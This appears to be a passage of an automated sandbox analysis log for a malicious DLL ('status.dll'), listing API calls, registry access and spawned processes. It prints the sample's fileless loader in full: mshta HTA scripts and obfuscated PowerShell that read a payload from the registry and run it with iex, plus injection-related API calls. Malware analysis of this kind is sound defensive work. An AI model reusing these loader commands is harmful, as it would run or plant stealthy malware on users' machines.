Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05923B11 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 5_2_05923B11
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591EB58 memset,NtQueryInformationProcess, 5_2_0591EB58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC462B GetProcAddress,NtCreateSection,memset, 6_2_00AC462B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC2A0A NtMapViewOfSection, 6_2_00AC2A0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC77BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 6_2_00AC77BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC8401 NtQueryVirtualMemory, 6_2_00AC8401
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A41EE memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 6_2_009A41EE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099ECB4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 6_2_0099ECB4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099DC0B NtQueryInformationProcess, 6_2_0099DC0B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009AEC5A RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 6_2_009AEC5A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A945C GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 6_2_009A945C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00993D90 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 6_2_00993D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099F6C4 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 6_2_0099F6C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099C084 VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 6_2_0099C084
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099B012 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 6_2_0099B012
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009AA044 NtGetContextThread,RtlNtStatusToDosError, 6_2_009AA044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009961AD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 6_2_009961AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A43A0 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 6_2_009A43A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009ADBFA NtQuerySystemInformation,RtlNtStatusToDosError, 6_2_009ADBFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A3B11 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 6_2_009A3B11
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099EB58 memset,NtQueryInformationProcess, 6_2_0099EB58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099C423 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 6_2_0099C423
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009AD52D NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 6_2_009AD52D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A16BA NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 6_2_009A16BA
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: status.dll ReversingLabs: Detection: 23%
Source: status.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\status.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\status.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\status.dll
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\status.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\status.dll,DllRegisterServer
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17422 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82956 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17430 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82992 /prefetch:2
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4702.tmp" "c:\Users\user\AppData\Local\Temp\eutk2hxp\CSC3C520F3552234BD5981E8C2C19975E5B.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES49B1.tmp" "c:\Users\user\AppData\Local\Temp\5nzflxas\CSCCA0D8D115C84DA1A0293F6BF85846.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D3C.tmp" "c:\Users\user\AppData\Local\Temp\fyriofhk\CSC7F089C7BD9A5426483691E56FD9DB0F7.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES522D.tmp" "c:\Users\user\AppData\Local\Temp\yycrjy0w\CSCDAC2BC21A294475B86B2FDF784B11415.TMP"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67D8.tmp" "c:\Users\user\AppData\Local\Temp\babtdr3v\CSC990A060DA8974A64BF3BB68C9993246.TMP"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\status.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\status.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\status.dll,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\status.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17422 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82956 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17430 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82992 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4702.tmp" "c:\Users\user\AppData\Local\Temp\eutk2hxp\CSC3C520F3552234BD5981E8C2C19975E5B.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES49B1.tmp" "c:\Users\user\AppData\Local\Temp\5nzflxas\CSCCA0D8D115C84DA1A0293F6BF85846.TMP"
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D3C.tmp" "c:\Users\user\AppData\Local\Temp\fyriofhk\CSC7F089C7BD9A5426483691E56FD9DB0F7.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES522D.tmp" "c:\Users\user\AppData\Local\Temp\yycrjy0w\CSCDAC2BC21A294475B86B2FDF784B11415.TMP"
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67D8.tmp" "c:\Users\user\AppData\Local\Temp\babtdr3v\CSC990A060DA8974A64BF3BB68C9993246.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DFABD2BAAC7D7BDC70.TMP Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winDLL@80/93@8/2
Source: C:\Windows\System32\loaddll32.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
